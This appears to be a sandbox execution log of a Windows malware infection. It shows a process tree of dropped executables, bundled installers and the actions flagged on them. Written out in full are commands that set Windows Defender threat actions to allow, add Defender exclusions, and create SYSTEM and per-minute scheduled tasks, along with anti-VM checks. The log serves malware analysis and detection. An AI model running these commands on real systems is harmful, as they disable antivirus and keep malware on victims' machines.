C:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exe"C:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4876 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428043527" --session-guid=922f0eff-0f84-4924-a69b-2c814f17cfb6 --server-tracking-blob="YTBlZGM1ODBjMmMwMDZmNGI3NzQ3ZTJlNjc4OTY0MGMwNzc0MTZkN2ExZWE2MzY2MDA3YzIxYzc2OThmNWJiYTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0Mjc4OTIxLjk5OTciLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMzNiN2YyODQtNGQxZi00YjhiLThhYTQtMjU5YzBjYWNiNTJjIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=30050000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exeC:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x13c,0x2c8,0x6a5fe1d0,0x6a5fe1dc,0x6a5fe1e86⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\assistant\assistant_installer.exe" --version5⤵
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x1026038,0x1026044,0x10260506⤵
-
C:\Users\Admin\Pictures\TSG0dxvUxIJDY4V4LguJj7eN.exe"C:\Users\Admin\Pictures\TSG0dxvUxIJDY4V4LguJj7eN.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS7942.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 04:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7942.tmp\Install.exe\" Wt /YOFdidzkZk 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵
-
C:\Users\Admin\Pictures\AGdHM7Hk4RUWQH3BLLGIuj6D.exe"C:\Users\Admin\Pictures\AGdHM7Hk4RUWQH3BLLGIuj6D.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe5⤵
-
C:\Windows\SYSTEM32\msiexec.exe"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"6⤵
-
C:\Users\Admin\Pictures\BQWPihv4uKM5RNC27yFALEp0.exe"C:\Users\Admin\Pictures\BQWPihv4uKM5RNC27yFALEp0.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS57BB.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'3⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1332 -ip 13321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4432 -ip 44321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4452 -ip 44521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5172 -ip 51721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3240 -ip 32401⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2296 -ip 22961⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS7942.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS7942.tmp\Install.exe Wt /YOFdidzkZk 385118 /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
